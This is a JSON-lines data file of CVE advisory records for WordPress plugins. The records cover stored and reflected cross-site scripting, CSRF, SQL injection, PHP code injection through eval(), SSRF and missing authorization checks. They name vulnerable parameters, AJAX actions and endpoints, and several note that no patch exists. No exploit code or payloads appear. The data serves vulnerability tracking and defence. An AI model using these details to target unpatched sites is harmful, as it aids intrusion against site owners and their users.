{"CVE_ID":"CVE-2024-11709","slug":"ai-post-generator","versionImpact":"3.5","description":"The AI Post Generator | AutoWriter plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ai_post_generator_delete_Post AJAX action in all versions up to, and including, 3.5. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary pages and posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-post-generator\\\/trunk\\\/inc\\\/insert-head.php#L430\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-post-generator\\\/trunk\\\/inc\\\/insert-head.php#L430\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-post-generator\\\/trunk\\\/inc\\\/insert-head.php#L512\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-post-generator\\\/trunk\\\/inc\\\/insert-head.php#L512\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00ac468-870a-4c43-af25-9febea5e4d67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00ac468-870a-4c43-af25-9febea5e4d67?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11196","slug":"multi-column-tag-map","versionImpact":"17.0.33","description":"The Multi-column Tag Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mctagmap shortcode in all versions up to, and including, 17.0.33 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L1176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L1176\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L1179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L1179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-column-tag-map\\\/tags\\\/17.0.33\\\/mctagmap_functions.php#L135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multi-column-tag-map\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multi-column-tag-map\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb41862a-0cde-46f0-bd86-5a04e76f7345?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb41862a-0cde-46f0-bd86-5a04e76f7345?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11328","slug":"cluevo-lms","versionImpact":"1.13.2","description":"The CLUEVO LMS, E-Learning Platform plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.13.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/admin-views\\\/class.module-ratings-page.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/admin-views\\\/class.module-ratings-page.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1228\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1228\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1230\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L1242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L788\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cluevo-lms\\\/tags\\\/1.13.2\\\/functions\\\/functions.module-management.inc.php#L788\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bcfe315-2db1-4f6c-9635-a7fdf5404adf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5bcfe315-2db1-4f6c-9635-a7fdf5404adf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13397","slug":"wpradio","versionImpact":"1.0.4","description":"The WPRadio \u2013 WordPress Radio Streaming Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpradio_player' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpradio\\\/trunk\\\/Frontend\\\/Frontend.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpradio\\\/trunk\\\/Frontend\\\/Frontend.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f153174a-1226-4c16-ba8b-637be1d7e742?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f153174a-1226-4c16-ba8b-637be1d7e742?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6215","slug":"omnishop","versionImpact":"1.0.9","description":"The Omnishop plugin for WordPress is vulnerable to Unauthenticated Registration Bypass in all versions up to, and including, 1.0.9. Its \/users\/register endpoint is exposed to the public (permission_callback always returns true) and invokes wp_create_user() unconditionally,  ignoring the site\u2019s users_can_register option and any nonce or CAPTCHA checks. This makes it possible for unauthenticated attackers to create arbitrary user accounts (customer) on sites where registrations should be closed.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/omnishop\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/omnishop\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12d465d2-cd89-476e-b70a-743151a23053?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12d465d2-cd89-476e-b70a-743151a23053?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0619","slug":"kraken-image-optimizer","versionImpact":"2.6.8","description":"The Kraken.io Image Optimizer plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 2.6.8. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to reset image optimizations.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f94eabc5-6e3b-46df-9e36-d7d0fad833de\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f94eabc5-6e3b-46df-9e36-d7d0fad833de\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kraken-image-optimizer\\\/tags\\\/2.6.6\\\/kraken.php#L705\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kraken-image-optimizer\\\/tags\\\/2.6.6\\\/kraken.php#L705\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0066","slug":"companion-sitemap-generator","versionImpact":"4.5.1.1","description":"The Companion Sitemap Generator WordPress plugin through 4.5.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/545c9e2f-bacd-4f30-ae01-de1583e26d32\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/545c9e2f-bacd-4f30-ae01-de1583e26d32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45846","slug":"image-map-pro ","versionImpact":"5.5.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in Nickys Image Map Pro for WordPress - Interactive SVG Image Map Builder plugin <\u00a05.6.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/image-map-pro-wordpress\\\/wordpress-image-map-pro-premium-plugin-5-5-0-multiple-cross-site-request-forgery-csrf-vulnerabilities?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/image-map-pro-wordpress\\\/wordpress-image-map-pro-premium-plugin-5-5-0-multiple-cross-site-request-forgery-csrf-vulnerabilities?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2584","slug":"pixelyoursite","versionImpact":"9.3.6","description":"The PixelYourSite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 9.3.6 (9.6.1 in the Pro version) due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelyoursite\\\/trunk\\\/modules\\\/head_footer\\\/head_footer.php?rev=2773949#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pixelyoursite\\\/trunk\\\/modules\\\/head_footer\\\/head_footer.php?rev=2773949#L73\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ebf1e83-50b8-4f56-ba76-10100375edda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ebf1e83-50b8-4f56-ba76-10100375edda?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2912301%40pixelyoursite%2Ftrunk&old=2897911%40pixelyoursite%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2912301%40pixelyoursite%2Ftrunk&old=2897911%40pixelyoursite%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4408","slug":"dw-question-answer","versionImpact":"1.5.8","description":"The DW Question & Answer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.8. This is due to missing or incorrect nonce validation on the update_answer() function. This makes it possible for unauthenticated attackers to update answers to questions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dw-question-answer\\\/trunk\\\/inc\\\/Handle.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dw-question-answer\\\/trunk\\\/inc\\\/Handle.php#L138\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9852e499-f413-4218-9bac-6c2be62ecc32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9852e499-f413-4218-9bac-6c2be62ecc32?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5054","slug":"superstorefinder-wp","versionImpact":"6.9.2","description":"The Super Store Finder plugin for WordPress is vulnerable to unauthenticated arbitrary email creation and relay in versions up to, and including, 6.9.2. This is due to insufficient restrictions on the sendMail.php file that allows direct access. This makes it possible for unauthenticated attackers to send emails utilizing the vulnerable site's server, with arbitrary content. Please note that this vulnerability has already been publicly disclosed with an exploit which is why we are publishing the details without a patch available, we are attempting to initiate contact with the developer.","refs":"[{\"url\":\"https:\\\/\\\/superstorefinder.net\\\/\",\"name\":\"https:\\\/\\\/superstorefinder.net\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d31d0553-9378-4c7e-a258-12562aa6b388?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d31d0553-9378-4c7e-a258-12562aa6b388?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-24410","slug":"fluentform","versionImpact":"4.3.25","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Contact Form - WPManageNinja LLC Contact Form Plugin \u2013 Fastest Contact Form Builder Plugin for WordPress by Fluent Forms fluentform allows SQL Injection.This issue affects Contact Form Plugin \u2013 Fastest Contact Form Builder Plugin for WordPress by Fluent Forms: from n\/a through 4.3.25.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fluentform\\\/wordpress-fluentform-plugin-4-3-25-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/fluentform\\\/wordpress-fluentform-plugin-4-3-25-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3644","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10eb712a-d9c3-46c9-be6a-02811396fae8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/10eb712a-d9c3-46c9-be6a-02811396fae8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3562","slug":"custom-field-suite","versionImpact":"2.6.7","description":"The Custom Field Suite plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 2.6.7 via the Loop custom field. This is due to insufficient sanitization of input prior to being used in a call to the eval() function. This makes it possible for authenticated attackers, with contributor-level access and above, to execute arbitrary PHP code on the server.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd7b788-03a0-41a4-96f2-cfca74ef281b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dfd7b788-03a0-41a4-96f2-cfca74ef281b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/loop.php#L192\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/loop.php#L192\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/loop.php#L224\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/loop.php#L224\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/field-types\\\/loop.html\",\"name\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/field-types\\\/loop.html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11459","slug":"country-blocker","versionImpact":"3.2","description":"The Country Blocker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ip' parameter in all versions up to, and including, 3.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-blocker\\\/trunk\\\/block-page.php#L597\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-blocker\\\/trunk\\\/block-page.php#L597\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-blocker\\\/trunk\\\/block-page.php#L605\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/country-blocker\\\/trunk\\\/block-page.php#L605\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d8f2aaf-43db-412b-947c-ca1eb946c3aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d8f2aaf-43db-412b-947c-ca1eb946c3aa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13153","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.135","description":"The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.5.135 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: Since the widget code isn't part of the code, to apply the patch, the affected widgets: Image Tooltip, Notification, Simple Popup, Video Play Button, and Card Carousel, must be deleted and reinstalled manually.","refs":"[{\"url\":\"https:\\\/\\\/unlimited-elements.com\\\/change-log\\\/\",\"name\":\"https:\\\/\\\/unlimited-elements.com\\\/change-log\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99625a3e-b8a4-42f8-8996-f7c5c0ff2d5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99625a3e-b8a4-42f8-8996-f7c5c0ff2d5f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13396","slug":"frictionless","versionImpact":"0.0.23","description":"The Frictionless plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'frictionless_form' shortcode[s] in all versions up to, and including, 0.0.23 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frictionless\\\/trunk\\\/frictionless.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frictionless\\\/trunk\\\/frictionless.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frictionless\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frictionless\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1ec9dce-d0fb-4b7b-a8e4-4ccb474c9d57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1ec9dce-d0fb-4b7b-a8e4-4ccb474c9d57?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1662","slug":"url-media-uploader","versionImpact":"1.0.0","description":"The URL Media Uploader plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.0.0 via the 'url_media_uploader_url_upload' action. This makes it possible for authenticated attackers, with author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/url-media-uploader\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/url-media-uploader\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae8f1852-2d67-4ed9-ab3d-5b3bf4083e06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae8f1852-2d67-4ed9-ab3d-5b3bf4083e06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3862","slug":"contest-gallery","versionImpact":"26.0.6","description":"Contest Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 26.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/26.0.5\\\/shortcodes\\\/cg_entry_on_off.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/26.0.5\\\/shortcodes\\\/cg_entry_on_off.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/26.0.7\\\/shortcodes\\\/cg_entry_on_off.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/26.0.7\\\/shortcodes\\\/cg_entry_on_off.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288915\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288915\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contest-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contest-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.contest-gallery.com\\\/documentation\\\/\",\"name\":\"https:\\\/\\\/www.contest-gallery.com\\\/documentation\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1b043a1-7bee-4ef0-86d9-19cf202cfc71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1b043a1-7bee-4ef0-86d9-19cf202cfc71?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-50050","slug":"job-postings","versionImpact":"2.7.12","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress allows Stored XSS. This issue affects Jobs for WordPress: from n\/a through 2.7.12.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/job-postings\\\/vulnerability\\\/wordpress-jobs-for-wordpress-plugin-2-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/job-postings\\\/vulnerability\\\/wordpress-jobs-for-wordpress-plugin-2-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
